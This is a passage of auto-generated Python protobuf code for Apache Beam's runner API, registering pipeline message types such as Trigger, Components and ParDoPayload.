_TRIGGER.fields_by_name['after_synchronized_processing_time'])
_TRIGGER.fields_by_name['after_synchronized_processing_time'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['always'])
_TRIGGER.fields_by_name['always'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['default'])
_TRIGGER.fields_by_name['default'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['element_count'])
_TRIGGER.fields_by_name['element_count'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['never'])
_TRIGGER.fields_by_name['never'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['or_finally'])
_TRIGGER.fields_by_name['or_finally'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TRIGGER.oneofs_by_name['trigger'].fields.append(
_TRIGGER.fields_by_name['repeat'])
_TRIGGER.fields_by_name['repeat'].containing_oneof = _TRIGGER.oneofs_by_name['trigger']
_TIMESTAMPTRANSFORM_DELAY.containing_type = _TIMESTAMPTRANSFORM
_TIMESTAMPTRANSFORM_ALIGNTO.containing_type = _TIMESTAMPTRANSFORM
_TIMESTAMPTRANSFORM.fields_by_name['delay'].message_type = _TIMESTAMPTRANSFORM_DELAY
_TIMESTAMPTRANSFORM.fields_by_name['align_to'].message_type = _TIMESTAMPTRANSFORM_ALIGNTO
_TIMESTAMPTRANSFORM.oneofs_by_name['timestamp_transform'].fields.append(
_TIMESTAMPTRANSFORM.fields_by_name['delay'])
_TIMESTAMPTRANSFORM.fields_by_name['delay'].containing_oneof = _TIMESTAMPTRANSFORM.oneofs_by_name['timestamp_transform']
_TIMESTAMPTRANSFORM.oneofs_by_name['timestamp_transform'].fields.append(
_TIMESTAMPTRANSFORM.fields_by_name['align_to'])
_TIMESTAMPTRANSFORM.fields_by_name['align_to'].containing_oneof = _TIMESTAMPTRANSFORM.oneofs_by_name['timestamp_transform']
_SIDEINPUT.fields_by_name['access_pattern'].message_type = _FUNCTIONSPEC
_SIDEINPUT.fields_by_name['view_fn'].message_type = _SDKFUNCTIONSPEC
_SIDEINPUT.fields_by_name['window_mapping_fn'].message_type = _SDKFUNCTIONSPEC
_STANDARDENVIRONMENTS_ENVIRONMENTS.containing_type = _STANDARDENVIRONMENTS
_PROCESSPAYLOAD_ENVENTRY.containing_type = _PROCESSPAYLOAD
_PROCESSPAYLOAD.fields_by_name['env'].message_type = _PROCESSPAYLOAD_ENVENTRY
_SDKFUNCTIONSPEC.fields_by_name['spec'].message_type = _FUNCTIONSPEC
_DISPLAYDATA_IDENTIFIER.containing_type = _DISPLAYDATA
_DISPLAYDATA_ITEM.fields_by_name['id'].message_type = _DISPLAYDATA_IDENTIFIER
_DISPLAYDATA_ITEM.fields_by_name['type'].enum_type = _DISPLAYDATA_TYPE_ENUM
_DISPLAYDATA_ITEM.fields_by_name['value'].message_type = google_dot_protobuf_dot_any__pb2._ANY
_DISPLAYDATA_ITEM.fields_by_name['short_value'].message_type = google_dot_protobuf_dot_any__pb2._ANY
_DISPLAYDATA_ITEM.containing_type = _DISPLAYDATA
_DISPLAYDATA_TYPE.containing_type = _DISPLAYDATA
_DISPLAYDATA_TYPE_ENUM.containing_type = _DISPLAYDATA_TYPE
_DISPLAYDATA.fields_by_name['items'].message_type = _DISPLAYDATA_ITEM
_MESSAGEWITHCOMPONENTS.fields_by_name['components'].message_type = _COMPONENTS
_MESSAGEWITHCOMPONENTS.fields_by_name['coder'].message_type = _CODER
_MESSAGEWITHCOMPONENTS.fields_by_name['combine_payload'].message_type = _COMBINEPAYLOAD
_MESSAGEWITHCOMPONENTS.fields_by_name['sdk_function_spec'].message_type = _SDKFUNCTIONSPEC
_MESSAGEWITHCOMPONENTS.fields_by_name['par_do_payload'].message_type = _PARDOPAYLOAD
_MESSAGEWITHCOMPONENTS.fields_by_name['ptransform'].message_type = _PTRANSFORM
_MESSAGEWITHCOMPONENTS.fields_by_name['pcollection'].message_type = _PCOLLECTION
_MESSAGEWITHCOMPONENTS.fields_by_name['read_payload'].message_type = _READPAYLOAD
_MESSAGEWITHCOMPONENTS.fields_by_name['side_input'].message_type = _SIDEINPUT
_MESSAGEWITHCOMPONENTS.fields_by_name['window_into_payload'].message_type = _WINDOWINTOPAYLOAD
_MESSAGEWITHCOMPONENTS.fields_by_name['windowing_strategy'].message_type = _WINDOWINGSTRATEGY
_MESSAGEWITHCOMPONENTS.fields_by_name['function_spec'].message_type = _FUNCTIONSPEC
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['coder'])
_MESSAGEWITHCOMPONENTS.fields_by_name['coder'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['combine_payload'])
_MESSAGEWITHCOMPONENTS.fields_by_name['combine_payload'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['sdk_function_spec'])
_MESSAGEWITHCOMPONENTS.fields_by_name['sdk_function_spec'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['par_do_payload'])
_MESSAGEWITHCOMPONENTS.fields_by_name['par_do_payload'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['ptransform'])
_MESSAGEWITHCOMPONENTS.fields_by_name['ptransform'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['pcollection'])
_MESSAGEWITHCOMPONENTS.fields_by_name['pcollection'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['read_payload'])
_MESSAGEWITHCOMPONENTS.fields_by_name['read_payload'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['side_input'])
_MESSAGEWITHCOMPONENTS.fields_by_name['side_input'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['window_into_payload'])
_MESSAGEWITHCOMPONENTS.fields_by_name['window_into_payload'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['windowing_strategy'])
_MESSAGEWITHCOMPONENTS.fields_by_name['windowing_strategy'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['function_spec'])
_MESSAGEWITHCOMPONENTS.fields_by_name['function_spec'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_EXECUTABLESTAGEPAYLOAD_SIDEINPUTID.containing_type = _EXECUTABLESTAGEPAYLOAD
_EXECUTABLESTAGEPAYLOAD_USERSTATEID.containing_type = _EXECUTABLESTAGEPAYLOAD
_EXECUTABLESTAGEPAYLOAD_TIMERID.containing_type = _EXECUTABLESTAGEPAYLOAD
_EXECUTABLESTAGEPAYLOAD.fields_by_name['environment'].message_type = _ENVIRONMENT
_EXECUTABLESTAGEPAYLOAD.fields_by_name['side_inputs'].message_type = _EXECUTABLESTAGEPAYLOAD_SIDEINPUTID
_EXECUTABLESTAGEPAYLOAD.fields_by_name['components'].message_type = _COMPONENTS
_EXECUTABLESTAGEPAYLOAD.fields_by_name['user_states'].message_type = _EXECUTABLESTAGEPAYLOAD_USERSTATEID
_EXECUTABLESTAGEPAYLOAD.fields_by_name['timers'].message_type = _EXECUTABLESTAGEPAYLOAD_TIMERID
DESCRIPTOR.message_types_by_name['BeamConstants'] = _BEAMCONSTANTS
DESCRIPTOR.message_types_by_name['Components'] = _COMPONENTS
DESCRIPTOR.message_types_by_name['Pipeline'] = _PIPELINE
DESCRIPTOR.message_types_by_name['PTransform'] = _PTRANSFORM
DESCRIPTOR.message_types_by_name['StandardPTransforms'] = _STANDARDPTRANSFORMS
DESCRIPTOR.message_types_by_name['StandardSideInputTypes'] = _STANDARDSIDEINPUTTYPES
DESCRIPTOR.message_types_by_name['PCollection'] = _PCOLLECTION
DESCRIPTOR.message_types_by_name['ParDoPayload'] = _PARDOPAYLOAD
DESCRIPTOR.message_types_by_name['Parameter'] = _PARAMETER
DESCRIPTOR.message_types_by_name['StateSpec'] = _STATESPEC
DESCRIPTOR.message_types_by_name['ValueStateSpec'] = _VALUESTATESPEC
DESCRIPTOR.message_types_by_name['BagStateSpec'] = _BAGSTATESPEC
DESCRIPTOR.message_types_by_name['CombiningStateSpec'] = _COMBININGSTATESPEC
DESCRIPTOR.message_types_by_name['MapStateSpec'] = _MAPSTATESPEC
DESCRIPTOR.message_types_by_name['SetStateSpec'] = _SETSTATESPEC
DESCRIPTOR.message_types_by_name['TimerSpec'] = _TIMERSPEC
DESCRIPTOR.message_types_by_name['IsBounded'] = _ISBOUNDED
DESCRIPTOR.message_types_by_name['ReadPayload'] = _READPAYLOAD
DESCRIPTOR.message_types_by_name['WindowIntoPayload'] = _WINDOWINTOPAYLOAD
DESCRIPTOR.message_types_by_name['CombinePayload'] = _COMBINEPAYLOAD
DESCRIPTOR.message_types_by_name['TestStreamPayload'] = _TESTSTREAMPAYLOAD
DESCRIPTOR.message_types_by_name['WriteFilesPayload'] = _WRITEFILESPAYLOAD
DESCRIPTOR.message_types_by_name['Coder'] = _CODER
DESCRIPTOR.message_types_by_name['StandardCoders'] = _STANDARDCODERS
DESCRIPTOR.message_types_by_name['WindowingStrategy'] = _WINDOWINGSTRATEGY
DESCRIPTOR.message_types_by_name['MergeStatus'] = _MERGESTATUS
DESCRIPTOR.message_types_by_name['AccumulationMode'] = _ACCUMULATIONMODE
DESCRIPTOR.message_types_by_name['ClosingBehavior'] = _CLOSINGBEHAVIOR
DESCRIPTOR.message_types_by_name['OnTimeBehavior'] = _ONTIMEBEHAVIOR
DESCRIPTOR.message_types_by_name['OutputTime'] = _OUTPUTTIME
DESCRIPTOR.message_types_by_name['TimeDomain'] = _TIMEDOMAIN
DESCRIPTOR.message_types_by_name['Trigger'] = _TRIGGER
DESCRIPTOR.message_types_by_name['TimestampTransform'] = _TIMESTAMPTRANSFORM
DESCRIPTOR.message_types_by_name['SideInput'] = _SIDEINPUT
DESCRIPTOR.message_types_by_name['Environment'] = _ENVIRONMENT
DESCRIPTOR.message_types_by_name['StandardEnvironments'] = _STANDARDENVIRONMENTS
DESCRIPTOR.message_types_by_name['DockerPayload'] = _DOCKERPAYLOAD
DESCRIPTOR.message_types_by_name['ProcessPayload'] = _PROCESSPAYLOAD
DESCRIPTOR.message_types_by_name['SdkFunctionSpec'] = _SDKFUNCTIONSPEC
DESCRIPTOR.message_types_by_name['FunctionSpec'] = _FUNCTIONSPEC
DESCRIPTOR.message_types_by_name['DisplayData'] = _DISPLAYDATA
DESCRIPTOR.message_types_by_name['MessageWithComponents'] = _MESSAGEWITHCOMPONENTS
DESCRIPTOR.message_types_by_name['ExecutableStagePayload'] = _EXECUTABLESTAGEPAYLOAD
DESCRIPTOR.extensions_by_name['beam_urn'] = beam_urn
DESCRIPTOR.extensions_by_name['beam_constant'] = beam_constant
BeamConstants = _reflection.GeneratedProtocolMessageType('BeamConstants', (_message.Message,), dict(
DESCRIPTOR = _BEAMCONSTANTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.BeamConstants)
))
_sym_db.RegisterMessage(BeamConstants)
Components = _reflection.GeneratedProtocolMessageType('Components', (_message.Message,), dict(
TransformsEntry = _reflection.GeneratedProtocolMessageType('TransformsEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_TRANSFORMSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.TransformsEntry)
))
,
PcollectionsEntry = _reflection.GeneratedProtocolMessageType('PcollectionsEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_PCOLLECTIONSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry)
))
,
WindowingStrategiesEntry = _reflection.GeneratedProtocolMessageType('WindowingStrategiesEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_WINDOWINGSTRATEGIESENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry)
))
,
CodersEntry = _reflection.GeneratedProtocolMessageType('CodersEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_CODERSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.CodersEntry)
))
,
EnvironmentsEntry = _reflection.GeneratedProtocolMessageType('EnvironmentsEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_ENVIRONMENTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry)
))
,
DESCRIPTOR = _COMPONENTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components)
))
_sym_db.RegisterMessage(Components)
_sym_db.RegisterMessage(Components.TransformsEntry)
_sym_db.RegisterMessage(Components.PcollectionsEntry)
_sym_db.RegisterMessage(Components.WindowingStrategiesEntry)
_sym_db.RegisterMessage(Components.CodersEntry)
_sym_db.RegisterMessage(Components.EnvironmentsEntry)
Pipeline = _reflection.GeneratedProtocolMessageType('Pipeline', (_message.Message,), dict(
DESCRIPTOR = _PIPELINE,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Pipeline)
))
_sym_db.RegisterMessage(Pipeline)
PTransform = _reflection.GeneratedProtocolMessageType('PTransform', (_message.Message,), dict(
InputsEntry = _reflection.GeneratedProtocolMessageType('InputsEntry', (_message.Message,), dict(
DESCRIPTOR = _PTRANSFORM_INPUTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.PTransform.InputsEntry)
))
,
OutputsEntry = _reflection.GeneratedProtocolMessageType('OutputsEntry', (_message.Message,), dict(
DESCRIPTOR = _PTRANSFORM_OUTPUTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry)
))
,
DESCRIPTOR = _PTRANSFORM,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.PTransform)
))
_sym_db.RegisterMessage(PTransform)
_sym_db.RegisterMessage(PTransform.InputsEntry)
_sym_db.RegisterMessage(PTransform.OutputsEntry)
StandardPTransforms = _reflection.GeneratedProtocolMessageType('StandardPTransforms', (_message.Message,), dict(
DESCRIPTOR = _STANDARDPTRANSFORMS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StandardPTransforms)
))
_sym_db.RegisterMessage(StandardPTransforms)
StandardSideInputTypes = _reflection.GeneratedProtocolMessageType('StandardSideInputTypes', (_message.Message,), dict(
DESCRIPTOR = _STANDARDSIDEINPUTTYPES,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StandardSideInputTypes)
))
_sym_db.RegisterMessage(StandardSideInputTypes)
PCollection = _reflection.GeneratedProtocolMessageType('PCollection', (_message.Message,), dict(
DESCRIPTOR = _PCOLLECTION,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.PCollection)
))
_sym_db.RegisterMessage(PCollection)
ParDoPayload = _reflection.GeneratedProtocolMessageType('ParDoPayload', (_message.Message,), dict(
SideInputsEntry = _reflection.GeneratedProtocolMessageType('SideInputsEntry', (_message.Message,), dict(
DESCRIPTOR = _PARDOPAYLOAD_SIDEINPUTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry)
))
,
StateSpecsEntry = _reflection.GeneratedProtocolMessageType('StateSpecsEntry', (_message.Message,), dict(
DESCRIPTOR = _PARDOPAYLOAD_STATESPECSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry)
))
,
TimerSpecsEntry = _reflection.GeneratedProtocolMessageType('TimerSpecsEntry', (_message.Message,), dict(
DESCRIPTOR = _PARDOPAYLOAD_TIMERSPECSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry)
))
,
DESCRIPTOR = _PARDOPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ParDoPayload)
))
_sym_db.RegisterMessage(ParDoPayload)
_sym_db.RegisterMessage(ParDoPayload.SideInputsEntry)
_sym_db.RegisterMessage(ParDoPayload.StateSpecsEntry)
_sym_db.RegisterMessage(ParDoPayload.TimerSpecsEntry)
Parameter = _reflection.GeneratedProtocolMessageType('Parameter', (_message.Message,), dict(
Type = _reflection.GeneratedProtocolMessageType('Type', (_message.Message,), dict(
DESCRIPTOR = _PARAMETER_TYPE,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Parameter.Type)
))
,
DESCRIPTOR = _PARAMETER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Parameter)
))
_sym_db.RegisterMessage(Parameter)
_sym_db.RegisterMessage(Parameter.Type)
StateSpec = _reflection.GeneratedProtocolMessageType('StateSpec', (_message.Message,), dict(
DESCRIPTOR = _STATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StateSpec)
))
_sym_db.RegisterMessage(StateSpec)
ValueStateSpec = _reflection.GeneratedProtocolMessageType('ValueStateSpec', (_message.Message,), dict(
DESCRIPTOR = _VALUESTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ValueStateSpec)
))
_sym_db.RegisterMessage(ValueStateSpec)
BagStateSpec = _reflection.GeneratedProtocolMessageType('BagStateSpec', (_message.Message,), dict(
DESCRIPTOR = _BAGSTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.BagStateSpec)
))
_sym_db.RegisterMessage(BagStateSpec)
CombiningStateSpec = _reflection.GeneratedProtocolMessageType('CombiningStateSpec', (_message.Message,), dict(
DESCRIPTOR = _COMBININGSTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.CombiningStateSpec)
))
_sym_db.RegisterMessage(CombiningStateSpec)
MapStateSpec = _reflection.GeneratedProtocolMessageType('MapStateSpec', (_message.Message,), dict(
DESCRIPTOR = _MAPSTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.MapStateSpec)
))
_sym_db.RegisterMessage(MapStateSpec)
SetStateSpec = _reflection.GeneratedProtocolMessageType('SetStateSpec', (_message.Message,), dict(
DESCRIPTOR = _SETSTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.SetStateSpec)
))
_sym_db.RegisterMessage(SetStateSpec)
TimerSpec = _reflection.GeneratedProtocolMessageType('TimerSpec', (_message.Message,), dict(
DESCRIPTOR = _TIMERSPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimerSpec)
))
_sym_db.RegisterMessage(TimerSpec)
IsBounded = _reflection.GeneratedProtocolMessageType('IsBounded', (_message.Message,), dict(
DESCRIPTOR = _ISBOUNDED,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.IsBounded)
))
_sym_db.RegisterMessage(IsBounded)
ReadPayload = _reflection.GeneratedProtocolMessageType('ReadPayload', (_message.Message,), dict(
DESCRIPTOR = _READPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ReadPayload)
))
_sym_db.RegisterMessage(ReadPayload)
WindowIntoPayload = _reflection.GeneratedProtocolMessageType('WindowIntoPayload', (_message.Message,), dict(
DESCRIPTOR = _WINDOWINTOPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.WindowIntoPayload)
))
_sym_db.RegisterMessage(WindowIntoPayload)
CombinePayload = _reflection.GeneratedProtocolMessageType('CombinePayload', (_message.Message,), dict(
DESCRIPTOR = _COMBINEPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.CombinePayload)
))
_sym_db.RegisterMessage(CombinePayload)
TestStreamPayload = _reflection.GeneratedProtocolMessageType('TestStreamPayload', (_message.Message,), dict(
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), dict(
AdvanceWatermark = _reflection.GeneratedProtocolMessageType('AdvanceWatermark', (_message.Message,), dict(
DESCRIPTOR = _TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceWatermark)
))
,
AdvanceProcessingTime = _reflection.GeneratedProtocolMessageType('AdvanceProcessingTime', (_message.Message,), dict(
DESCRIPTOR = _TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceProcessingTime)
))
,
AddElements = _reflection.GeneratedProtocolMessageType('AddElements', (_message.Message,), dict(
DESCRIPTOR = _TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AddElements)
))
,
DESCRIPTOR = _TESTSTREAMPAYLOAD_EVENT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.Event)
))
,
TimestampedElement = _reflection.GeneratedProtocolMessageType('TimestampedElement', (_message.Message,), dict(
DESCRIPTOR = _TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElement)
))
,
DESCRIPTOR = _TESTSTREAMPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload)
))
_sym_db.RegisterMessage(TestStreamPayload)
_sym_db.RegisterMessage(TestStreamPayload.Event)
_sym_db.RegisterMessage(TestStreamPayload.Event.AdvanceWatermark)
_sym_db.RegisterMessage(TestStreamPayload.Event.AdvanceProcessingTime)
_sym_db.RegisterMessage(TestStreamPayload.Event.AddElements)
_sym_db.RegisterMessage(TestStreamPayload.TimestampedElement)
WriteFilesPayload = _reflection.GeneratedProtocolMessageType('WriteFilesPayload', (_message.Message,), dict(
SideInputsEntry = _reflection.GeneratedProtocolMessageType('SideInputsEntry', (_message.Message,), dict(
DESCRIPTOR = _WRITEFILESPAYLOAD_SIDEINPUTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry)
))
,
DESCRIPTOR = _WRITEFILESPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.WriteFilesPayload)
))
_sym_db.RegisterMessage(WriteFilesPayload)
_sym_db.RegisterMessage(WriteFilesPayload.SideInputsEntry)
Coder = _reflection.GeneratedProtocolMessageType('Coder', (_message.Message,), dict(
DESCRIPTOR = _CODER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Coder)
))
_sym_db.RegisterMessage(Coder)
StandardCoders = _reflection.GeneratedProtocolMessageType('StandardCoders', (_message.Message,), dict(
DESCRIPTOR = _STANDARDCODERS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StandardCoders)
))
_sym_db.RegisterMessage(StandardCoders)
WindowingStrategy = _reflection.GeneratedProtocolMessageType('WindowingStrategy', (_message.Message,), dict(
DESCRIPTOR = _WINDOWINGSTRATEGY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.WindowingStrategy)
))
_sym_db.RegisterMessage(WindowingStrategy)
MergeStatus = _reflection.GeneratedProtocolMessageType('MergeStatus', (_message.Message,), dict(
DESCRIPTOR = _MERGESTATUS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.MergeStatus)
))
_sym_db.RegisterMessage(MergeStatus)
AccumulationMode = _reflection.GeneratedProtocolMessageType('AccumulationMode', (_message.Message,), dict(
DESCRIPTOR = _ACCUMULATIONMODE,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.AccumulationMode)
))
_sym_db.RegisterMessage(AccumulationMode)
ClosingBehavior = _reflection.GeneratedProtocolMessageType('ClosingBehavior', (_message.Message,), dict(
DESCRIPTOR = _CLOSINGBEHAVIOR,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ClosingBehavior)
))
_sym_db.RegisterMessage(ClosingBehavior)
OnTimeBehavior = _reflection.GeneratedProtocolMessageType('OnTimeBehavior', (_message.Message,), dict(
DESCRIPTOR = _ONTIMEBEHAVIOR,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.OnTimeBehavior)
))
_sym_db.RegisterMessage(OnTimeBehavior)
OutputTime = _reflection.GeneratedProtocolMessageType('OutputTime', (_message.Message,), dict(
DESCRIPTOR = _OUTPUTTIME,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.OutputTime)
))
_sym_db.RegisterMessage(OutputTime)
TimeDomain = _reflection.GeneratedProtocolMessageType('TimeDomain', (_message.Message,), dict(
DESCRIPTOR = _TIMEDOMAIN,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimeDomain)
))
_sym_db.RegisterMessage(TimeDomain)
Trigger = _reflection.GeneratedProtocolMessageType('Trigger', (_message.Message,), dict(
AfterAll = _reflection.GeneratedProtocolMessageType('AfterAll', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERALL,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterAll)
))
,
AfterAny = _reflection.GeneratedProtocolMessageType('AfterAny', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERANY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterAny)
))
,
AfterEach = _reflection.GeneratedProtocolMessageType('AfterEach', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTEREACH,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterEach)
))
,
AfterEndOfWindow = _reflection.GeneratedProtocolMessageType('AfterEndOfWindow', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERENDOFWINDOW,
__module__ = 'beam_runner_api_pb2'
